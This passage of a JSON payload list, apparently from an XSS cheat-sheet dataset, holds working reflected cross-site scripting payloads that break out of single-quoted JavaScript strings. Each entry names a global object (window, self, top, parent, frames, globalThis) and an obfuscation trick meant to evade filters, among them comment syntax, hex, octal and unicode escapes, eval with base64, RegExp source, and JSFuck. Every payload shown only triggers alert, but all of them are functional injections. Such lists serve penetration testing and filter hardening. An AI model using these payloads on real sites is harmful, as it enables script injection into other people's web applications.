 78 |     },
 79 |     {
 80 |         "description": "Reflected XSS into a JavaScript string: comment syntax (window)",
 81 |         "code": "';window[\/*foo*\/'alert'\/*bar*\/](window[\/*foo*\/'document'\/*bar*\/]['domain']);\/\/",
 82 |         "browsers": [
 83 |             "chrome",
 84 |             "firefox",
 85 |             "edge",
 86 |             "safari"
 87 |         ],
 88 |         "context": "js_string_single"
 89 |     },
 90 |     {
 91 |         "description": "Reflected XSS into a JavaScript string: comment syntax (self)",
 92 |         "code": "';self[\/*foo*\/'alert'\/*bar*\/](self[\/*foo*\/'document'\/*bar*\/]['domain']);\/\/",
 93 |         "browsers": [
 94 |             "chrome",
 95 |             "firefox",
 96 |             "edge",
 97 |             "safari"
 98 |         ],
 99 |         "context": "js_string_single"
100 |     },
101 |     {
102 |         "description": "Reflected XSS into a JavaScript string: comment syntax (this)",
103 |         "code": "';this[\/*foo*\/'alert'\/*bar*\/](this[\/*foo*\/'document'\/*bar*\/]['domain']);\/\/",
104 |         "browsers": [
105 |             "chrome",
106 |             "firefox",
107 |             "edge",
108 |             "safari"
109 |         ],
110 |         "context": "js_string_single"
111 |     },
112 |     {
113 |         "description": "Reflected XSS into a JavaScript string: comment syntax (top)",
114 |         "code": "';top[\/*foo*\/'alert'\/*bar*\/](top[\/*foo*\/'document'\/*bar*\/]['domain']);\/\/",
115 |         "browsers": [
116 |             "chrome",
117 |             "firefox",
118 |             "edge",
119 |             "safari"
120 |         ],
121 |         "context": "js_string_single"
122 |     },
123 |     {
124 |         "description": "Reflected XSS into a JavaScript string: comment syntax (parent)",
125 |         "code": "';parent[\/*foo*\/'alert'\/*bar*\/](parent[\/*foo*\/'document'\/*bar*\/]['domain']);\/\/",
126 |         "browsers": [
127 |             "chrome",
128 |             "firefox",
129 |             "edge",
130 |             "safari"
131 |         ],
132 |         "context": "js_string_single"
133 |     },
134 |     {
135 |         "description": "Reflected XSS into a JavaScript string: comment syntax (frames)",
136 |         "code": "';frames[\/*foo*\/'alert'\/*bar*\/](frames[\/*foo*\/'document'\/*bar*\/]['domain']);\/\/",
137 |         "browsers": [
138 |             "chrome",
139 |             "firefox",
140 |             "edge",
141 |             "safari"
142 |         ],
143 |         "context": "js_string_single"
144 |     },
145 |     {
146 |         "description": "Reflected XSS into a JavaScript string: comment syntax (globalThis)",
147 |         "code": "';globalThis[\/*foo*\/'alert'\/*bar*\/](globalThis[\/*foo*\/'document'\/*bar*\/]['domain']);\/\/",
148 |         "browsers": [
149 |             "chrome",
150 |             "firefox",
151 |             "edge",
152 |             "safari"
153 |         ],
154 |         "context": "js_string_single"
155 |     },
156 |     {
157 |         "description": "Reflected XSS into a JavaScript string: hex escape sequence (window)",
158 |         "code": "';window['\\x61\\x6c\\x65\\x72\\x74'](window['\\x64\\x6f\\x63\\x75\\x6d\\x65\\x6e\\x74']['\\x64\\x6f\\x6d\\x61\\x69\\x6e']);\/\/",
159 |         "browsers": [
160 |             "chrome",
161 |             "firefox",
162 |             "edge",
163 |             "safari"
164 |         ],
165 |         "context": "js_string_single"
166 |     },
167 |     {
168 |         "description": "Reflected XSS into a JavaScript string: hex escape sequence (self)",
169 |         "code": "';self['\\x61\\x6c\\x65\\x72\\x74'](self['\\x64\\x6f\\x63\\x75\\x6d\\x65\\x6e\\x74']['\\x64\\x6f\\x6d\\x61\\x69\\x6e']);\/\/",
170 |         "browsers": [
171 |             "chrome",
172 |             "firefox",
173 |             "edge",
174 |             "safari"
175 |         ],
176 |         "context": "js_string_single"
177 |     },
178 |     {
179 |         "description": "Reflected XSS into a JavaScript string: hex escape sequence (this)",
180 |         "code": "';this['\\x61\\x6c\\x65\\x72\\x74'](this['\\x64\\x6f\\x63\\x75\\x6d\\x65\\x6e\\x74']['\\x64\\x6f\\x6d\\x61\\x69\\x6e']);\/\/",
181 |         "browsers": [
182 |             "chrome",
183 |             "firefox",
184 |             "edge",
185 |             "safari"
186 |         ],
187 |         "context": "js_string_single"
188 |     },
189 |     {
190 |         "description": "Reflected XSS into a JavaScript string: hex escape sequence (top)",
191 |         "code": "';top['\\x61\\x6c\\x65\\x72\\x74'](top['\\x64\\x6f\\x63\\x75\\x6d\\x65\\x6e\\x74']['\\x64\\x6f\\x6d\\x61\\x69\\x6e']);\/\/",
192 |         "browsers": [
193 |             "chrome",
194 |             "firefox",
195 |             "edge",
196 |             "safari"
197 |         ],
198 |         "context": "js_string_single"
199 |     },
200 |     {
201 |         "description": "Reflected XSS into a JavaScript string: hex escape sequence (parent)",
202 |         "code": "';parent['\\x61\\x6c\\x65\\x72\\x74'](parent['\\x64\\x6f\\x63\\x75\\x6d\\x65\\x6e\\x74']['\\x64\\x6f\\x6d\\x61\\x69\\x6e']);\/\/",
203 |         "browsers": [
204 |             "chrome",
205 |             "firefox",
206 |             "edge",
207 |             "safari"
208 |         ],
209 |         "context": "js_string_single"
210 |     },
211 |     {
212 |         "description": "Reflected XSS into a JavaScript string: hex escape sequence (frames)",
213 |         "code": "';frames['\\x61\\x6c\\x65\\x72\\x74'](frames['\\x64\\x6f\\x63\\x75\\x6d\\x65\\x6e\\x74']['\\x64\\x6f\\x6d\\x61\\x69\\x6e']);\/\/",
214 |         "browsers": [
215 |             "chrome",
216 |             "firefox",
217 |             "edge",
218 |             "safari"
219 |         ],
220 |         "context": "js_string_single"
221 |     },
222 |     {
223 |         "description": "Reflected XSS into a JavaScript string: hex escape sequence (globalThis)",
224 |         "code": "';globalThis['\\x61\\x6c\\x65\\x72\\x74'](globalThis['\\x64\\x6f\\x63\\x75\\x6d\\x65\\x6e\\x74']['\\x64\\x6f\\x6d\\x61\\x69\\x6e']);\/\/",
225 |         "browsers": [
226 |             "chrome",
227 |             "firefox",
228 |             "edge",
229 |             "safari"
230 |         ],
231 |         "context": "js_string_single"
232 |     },
233 |     {
234 |         "description": "Reflected XSS into a JavaScript string: hex escape sequence and base64 encoded string (window)",
235 |         "code": "';window['\\x65\\x76\\x61\\x6c']('window[\"\\x61\\x6c\\x65\\x72\\x74\"](window[\"\\x61\\x74\\x6f\\x62\"](\"WFNT\"))');\/\/",
236 |         "browsers": [
237 |             "chrome",
238 |             "firefox",
239 |             "edge",
240 |             "safari"
241 |         ],
242 |         "context": "js_string_single"
243 |     },
244 |     {
245 |         "description": "Reflected XSS into a JavaScript string: hex escape sequence and base64 encoded string (self)",
246 |         "code": "';self['\\x65\\x76\\x61\\x6c']('self[\"\\x61\\x6c\\x65\\x72\\x74\"](self[\"\\x61\\x74\\x6f\\x62\"](\"WFNT\"))');\/\/",
247 |         "browsers": [
248 |             "chrome",
249 |             "firefox",
250 |             "edge",
251 |             "safari"
252 |         ],
253 |         "context": "js_string_single"
254 |     },
255 |     {
256 |         "description": "Reflected XSS into a JavaScript string: hex escape sequence and base64 encoded string (this)",
257 |         "code": "';this['\\x65\\x76\\x61\\x6c']('this[\"\\x61\\x6c\\x65\\x72\\x74\"](this[\"\\x61\\x74\\x6f\\x62\"](\"WFNT\"))');\/\/",
258 |         "browsers": [
259 |             "chrome",
260 |             "firefox",
261 |             "edge",
262 |             "safari"
263 |         ],
264 |         "context": "js_string_single"
265 |     },
266 |     {
267 |         "description": "Reflected XSS into a JavaScript string: hex escape sequence and base64 encoded string (top)",
268 |         "code": "';top['\\x65\\x76\\x61\\x6c']('top[\"\\x61\\x6c\\x65\\x72\\x74\"](top[\"\\x61\\x74\\x6f\\x62\"](\"WFNT\"))');\/\/",
269 |         "browsers": [
270 |             "chrome",
271 |             "firefox",
272 |             "edge",
273 |             "safari"
274 |         ],
275 |         "context": "js_string_single"
276 |     },
277 |     {
278 |         "description": "Reflected XSS into a JavaScript string: hex escape sequence and base64 encoded string (parent)",
279 |         "code": "';parent['\\x65\\x76\\x61\\x6c']('parent[\"\\x61\\x6c\\x65\\x72\\x74\"](parent[\"\\x61\\x74\\x6f\\x62\"](\"WFNT\"))');\/\/",
280 |         "browsers": [
281 |             "chrome",
282 |             "firefox",
283 |             "edge",
284 |             "safari"
285 |         ],
286 |         "context": "js_string_single"
287 |     },
288 |     {
289 |         "description": "Reflected XSS into a JavaScript string: hex escape sequence and base64 encoded string (frames)",
290 |         "code": "';frames['\\x65\\x76\\x61\\x6c']('frames[\"\\x61\\x6c\\x65\\x72\\x74\"](frames[\"\\x61\\x74\\x6f\\x62\"](\"WFNT\"))');\/\/",
291 |         "browsers": [
292 |             "chrome",
293 |             "firefox",
294 |             "edge",
295 |             "safari"
296 |         ],
297 |         "context": "js_string_single"
298 |     },
299 |     {
300 |         "description": "Reflected XSS into a JavaScript string: hex escape sequence and base64 encoded string (globalThis)",
301 |         "code": "';globalThis['\\x65\\x76\\x61\\x6c']('globalThis[\"\\x61\\x6c\\x65\\x72\\x74\"](globalThis[\"\\x61\\x74\\x6f\\x62\"](\"WFNT\"))');\/\/",
302 |         "browsers": [
303 |             "chrome",
304 |             "firefox",
305 |             "edge",
306 |             "safari"
307 |         ],
308 |         "context": "js_string_single"
309 |     },
310 |     {
311 |         "description": "Reflected XSS into a JavaScript string: octal escape sequence (window)",
312 |         "code": "';window['\\141\\154\\145\\162\\164']('\\130\\123\\123');\/\/",
313 |         "browsers": [
314 |             "chrome",
315 |             "firefox",
316 |             "edge",
317 |             "safari"
318 |         ],
319 |         "context": "js_string_single"
320 |     },
321 |     {
322 |         "description": "Reflected XSS into a JavaScript string: octal escape sequence (self)",
323 |         "code": "';self['\\141\\154\\145\\162\\164']('\\130\\123\\123');\/\/",
324 |         "browsers": [
325 |             "chrome",
326 |             "firefox",
327 |             "edge",
328 |             "safari"
329 |         ],
330 |         "context": "js_string_single"
331 |     },
332 |     {
333 |         "description": "Reflected XSS into a JavaScript string: octal escape sequence (this)",
334 |         "code": "';this['\\141\\154\\145\\162\\164']('\\130\\123\\123');\/\/",
335 |         "browsers": [
336 |             "chrome",
337 |             "firefox",
338 |             "edge",
339 |             "safari"
340 |         ],
341 |         "context": "js_string_single"
342 |     },
343 |     {
344 |         "description": "Reflected XSS into a JavaScript string: octal escape sequence (top)",
345 |         "code": "';top['\\141\\154\\145\\162\\164']('\\130\\123\\123');\/\/",
346 |         "browsers": [
347 |             "chrome",
348 |             "firefox",
349 |             "edge",
350 |             "safari"
351 |         ],
352 |         "context": "js_string_single"
353 |     },
354 |     {
355 |         "description": "Reflected XSS into a JavaScript string: octal escape sequence (parent)",
356 |         "code": "';parent['\\141\\154\\145\\162\\164']('\\130\\123\\123');\/\/",
357 |         "browsers": [
358 |             "chrome",
359 |             "firefox",
360 |             "edge",
361 |             "safari"
362 |         ],
363 |         "context": "js_string_single"
364 |     },
365 |     {
366 |         "description": "Reflected XSS into a JavaScript string: octal escape sequence (frames)",
367 |         "code": "';frames['\\141\\154\\145\\162\\164']('\\130\\123\\123');\/\/",
368 |         "browsers": [
369 |             "chrome",
370 |             "firefox",
371 |             "edge",
372 |             "safari"
373 |         ],
374 |         "context": "js_string_single"
375 |     },
376 |     {
377 |         "description": "Reflected XSS into a JavaScript string: octal escape sequence (globalThis)",
378 |         "code": "';globalThis['\\141\\154\\145\\162\\164']('\\130\\123\\123');\/\/",
379 |         "browsers": [
380 |             "chrome",
381 |             "firefox",
382 |             "edge",
383 |             "safari"
384 |         ],
385 |         "context": "js_string_single"
386 |     },
387 |     {
388 |         "description": "Reflected XSS into a JavaScript string: unicode escape (window)",
389 |         "code": "';window['\\u{0061}\\u{006c}\\u{0065}\\u{0072}\\u{0074}']('\\u{0058}\\u{0053}\\u{0053}');\/\/",
390 |         "browsers": [
391 |             "chrome",
392 |             "firefox",
393 |             "edge",
394 |             "safari"
395 |         ],
396 |         "context": "js_string_single"
397 |     },
398 |     {
399 |         "description": "Reflected XSS into a JavaScript string: unicode escape (self)",
400 |         "code": "';self['\\u{0061}\\u{006c}\\u{0065}\\u{0072}\\u{0074}']('\\u{0058}\\u{0053}\\u{0053}');\/\/",
401 |         "browsers": [
402 |             "chrome",
403 |             "firefox",
404 |             "edge",
405 |             "safari"
406 |         ],
407 |         "context": "js_string_single"
408 |     },
409 |     {
410 |         "description": "Reflected XSS into a JavaScript string: unicode escape (this)",
411 |         "code": "';this['\\u{0061}\\u{006c}\\u{0065}\\u{0072}\\u{0074}']('\\u{0058}\\u{0053}\\u{0053}');\/\/",
412 |         "browsers": [
413 |             "chrome",
414 |             "firefox",
415 |             "edge",
416 |             "safari"
417 |         ],
418 |         "context": "js_string_single"
419 |     },
420 |     {
421 |         "description": "Reflected XSS into a JavaScript string: unicode escape (top)",
422 |         "code": "';top['\\u{0061}\\u{006c}\\u{0065}\\u{0072}\\u{0074}']('\\u{0058}\\u{0053}\\u{0053}');\/\/",
423 |         "browsers": [
424 |             "chrome",
425 |             "firefox",
426 |             "edge",
427 |             "safari"
428 |         ],
429 |         "context": "js_string_single"
430 |     },
431 |     {
432 |         "description": "Reflected XSS into a JavaScript string: unicode escape (parent)",
433 |         "code": "';parent['\\u{0061}\\u{006c}\\u{0065}\\u{0072}\\u{0074}']('\\u{0058}\\u{0053}\\u{0053}');\/\/",
434 |         "browsers": [
435 |             "chrome",
436 |             "firefox",
437 |             "edge",
438 |             "safari"
439 |         ],
440 |         "context": "js_string_single"
441 |     },
442 |     {
443 |         "description": "Reflected XSS into a JavaScript string: unicode escape (frames)",
444 |         "code": "';frames['\\u{0061}\\u{006c}\\u{0065}\\u{0072}\\u{0074}']('\\u{0058}\\u{0053}\\u{0053}');\/\/",
445 |         "browsers": [
446 |             "chrome",
447 |             "firefox",
448 |             "edge",
449 |             "safari"
450 |         ],
451 |         "context": "js_string_single"
452 |     },
453 |     {
454 |         "description": "Reflected XSS into a JavaScript string: unicode escape (globalThis)",
455 |         "code": "';globalThis['\\u{0061}\\u{006c}\\u{0065}\\u{0072}\\u{0074}']('\\u{0058}\\u{0053}\\u{0053}');\/\/",
456 |         "browsers": [
457 |             "chrome",
458 |             "firefox",
459 |             "edge",
460 |             "safari"
461 |         ],
462 |         "context": "js_string_single"
463 |     },
464 |     {
465 |         "description": "Reflected XSS into a JavaScript string: RegExp source property (window)",
466 |         "code": "';window[\/al\/.source+\/ert\/.source](\/XSS\/.source);\/\/",
467 |         "browsers": [
468 |             "chrome",
469 |             "firefox",
470 |             "edge",
471 |             "safari"
472 |         ],
473 |         "context": "js_string_single"
474 |     },
475 |     {
476 |         "description": "Reflected XSS into a JavaScript string: RegExp source property (self)",
477 |         "code": "';self[\/al\/.source+\/ert\/.source](\/XSS\/.source);\/\/",
478 |         "browsers": [
479 |             "chrome",
480 |             "firefox",
481 |             "edge",
482 |             "safari"
483 |         ],
484 |         "context": "js_string_single"
485 |     },
486 |     {
487 |         "description": "Reflected XSS into a JavaScript string: RegExp source property (this)",
488 |         "code": "';this[\/al\/.source+\/ert\/.source](\/XSS\/.source);\/\/",
489 |         "browsers": [
490 |             "chrome",
491 |             "firefox",
492 |             "edge",
493 |             "safari"
494 |         ],
495 |         "context": "js_string_single"
496 |     },
497 |     {
498 |         "description": "Reflected XSS into a JavaScript string: RegExp source property (top)",
499 |         "code": "';top[\/al\/.source+\/ert\/.source](\/XSS\/.source);\/\/",
500 |         "browsers": [
501 |             "chrome",
502 |             "firefox",
503 |             "edge",
504 |             "safari"
505 |         ],
506 |         "context": "js_string_single"
507 |     },
508 |     {
509 |         "description": "Reflected XSS into a JavaScript string: RegExp source property (parent)",
510 |         "code": "';parent[\/al\/.source+\/ert\/.source](\/XSS\/.source);\/\/",
511 |         "browsers": [
512 |             "chrome",
513 |             "firefox",
514 |             "edge",
515 |             "safari"
516 |         ],
517 |         "context": "js_string_single"
518 |     },
519 |     {
520 |         "description": "Reflected XSS into a JavaScript string: RegExp source property (frames)",
521 |         "code": "';frames[\/al\/.source+\/ert\/.source](\/XSS\/.source);\/\/",
522 |         "browsers": [
523 |             "chrome",
524 |             "firefox",
525 |             "edge",
526 |             "safari"
527 |         ],
528 |         "context": "js_string_single"
529 |     },
530 |     {
531 |         "description": "Reflected XSS into a JavaScript string: RegExp source property (globalThis)",
532 |         "code": "';globalThis[\/al\/.source+\/ert\/.source](\/XSS\/.source);\/\/",
533 |         "browsers": [
534 |             "chrome",
535 |             "firefox",
536 |             "edge",
537 |             "safari"
538 |         ],
539 |         "context": "js_string_single"
540 |     },
541 |     {
542 |         "description": "Reflected XSS into a JavaScript string: Hieroglyphy\/JSFuck (window)",
543 |         "code": "';window[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]]);\/\/",
544 |         "browsers": [
545 |             "chrome",
546 |             "firefox",
547 |             "edge",
548 |             "safari"
549 |         ],
550 |         "context": "js_string_single"
551 |     },
552 |     {
553 |         "description": "Reflected XSS into a JavaScript string: Hieroglyphy\/JSFuck (self)",
554 |         "code": "';self[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]]);\/\/",
555 |         "browsers": [
556 |             "chrome",
557 |             "firefox",
558 |             "edge",
559 |             "safari"
560 |         ],
561 |         "context": "js_string_single"
562 |     },
563 |     {
564 |         "description": "Reflected XSS into a JavaScript string: Hieroglyphy\/JSFuck (this)",
565 |         "code": "';this[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]]);\/\/",
566 |         "browsers": [
567 |             "chrome",
568 |             "firefox",
569 |             "edge",
570 |             "safari"
571 |         ],
572 |         "context": "js_string_single"
573 |     },
574 |     {
575 |         "description": "Reflected XSS into a JavaScript string: Hieroglyphy\/JSFuck (top)",
576 |         "code": "';top[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]]);\/\/",
577 |         "browsers": [
578 |             "chrome",
579 |             "firefox",
580 |             "edge",
581 |             "safari"
582 |         ],
583 |         "context": "js_string_single"
584 |     },
585 |     {
586 |         "description": "Reflected XSS into a JavaScript string: Hieroglyphy\/JSFuck (parent)",
587 |         "code": "';parent[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]]);\/\/",
588 |         "browsers": [
589 |             "chrome",
590 |             "firefox",
591 |             "edge",
592 |             "safari"
593 |         ],
594 |         "context": "js_string_single"
595 |     },
596 |     {
597 |         "description": "Reflected XSS into a JavaScript string: Hieroglyphy\/JSFuck (frames)",
598 |         "code": "';frames[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]]);\/\/",
599 |         "browsers": [
600 |             "chrome",
601 |             "firefox",
602 |             "edge",
603 |             "safari"
604 |         ],
605 |         "context": "js_string_single"
606 |     },
607 |     {
608 |         "description": "Reflected XSS into a JavaScript string: Hieroglyphy\/JSFuck (globalThis)",
609 |         "code": "';globalThis[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]]);\/\/",
610 |         "browsers": [
611 |             "chrome",
612 |             "firefox",
613 |             "edge",
614 |             "safari"
615 |         ],
616 |         "context": "js_string_single"
617 |     }
618 | ]
619 | 


--------------------------------------------------------------------------------